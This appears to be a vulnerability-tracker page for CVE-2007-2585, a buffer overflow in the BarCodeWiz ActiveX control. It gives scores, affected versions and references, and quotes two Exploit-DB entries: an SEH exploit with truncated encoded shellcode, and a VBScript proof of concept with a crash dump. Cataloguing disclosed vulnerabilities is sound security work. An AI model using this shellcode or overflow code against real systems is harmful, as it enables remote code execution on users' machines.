CVE-2007-2585
published 2007-05-10CVE-2007-2585: Stack-based buffer overflow in the Verify function in the BarCodeWiz ActiveX control 2.0 and 2.52 (BarcodeWiz.dll) allows remote attackers to execute arbitrary…
PriorityP342critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.54%
93.0th percentile
Stack-based buffer overflow in the Verify function in the BarCodeWiz ActiveX control 2.0 and 2.52 (BarcodeWiz.dll) allows remote attackers to execute arbitrary code via a long argument.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| barcodewiz | barcode_activex_control | — | — |
| barcodewiz | barcode_activex_control | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)
exploitdb·2007-05-09
CVE-2007-2585 Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)
Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)
---
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%
Exploit-DB
Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
exploitdb·2007-05-09
CVE-2007-2585 Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)
---
2007/05/09
BarCodeWiz ActiveX Control 2.0 (BarcodeWiz.dll) Remote Buffer Overflow Exploit
url: http://www.barcodewiz.com/
price: from $139 to $2,350
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 full patched
Sub tryMe
buff = String(1032,"A")
get_EAX = "aaaa"
buff2 = String(1132,"A")
get_EIP = "bbbb"
egg = buff + get_EAX + buff2 + get_EIP + buff
test.Verify egg
End Sub
faultmon dump:
14:39:21.000 pid=1244 tid=1534 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [61616239])
EAX=61616161: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=03558474: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
E
No writeups or analysis indexed.
http://moaxb.blogspot.com/2007/05/moaxb-09-barcodewiz-activex-control-20.htmlhttp://osvdb.org/35869http://secunia.com/advisories/25209http://www.securityfocus.com/bid/23891http://www.shinnai.altervista.org/moaxb/20070509/barcodewiz.txthttp://www.vupen.com/english/advisories/2007/1728https://exchange.xforce.ibmcloud.com/vulnerabilities/34180http://moaxb.blogspot.com/2007/05/moaxb-09-barcodewiz-activex-control-20.htmlhttp://osvdb.org/35869http://secunia.com/advisories/25209http://www.securityfocus.com/bid/23891http://www.shinnai.altervista.org/moaxb/20070509/barcodewiz.txthttp://www.vupen.com/english/advisories/2007/1728https://exchange.xforce.ibmcloud.com/vulnerabilities/34180
2007-05-10
Published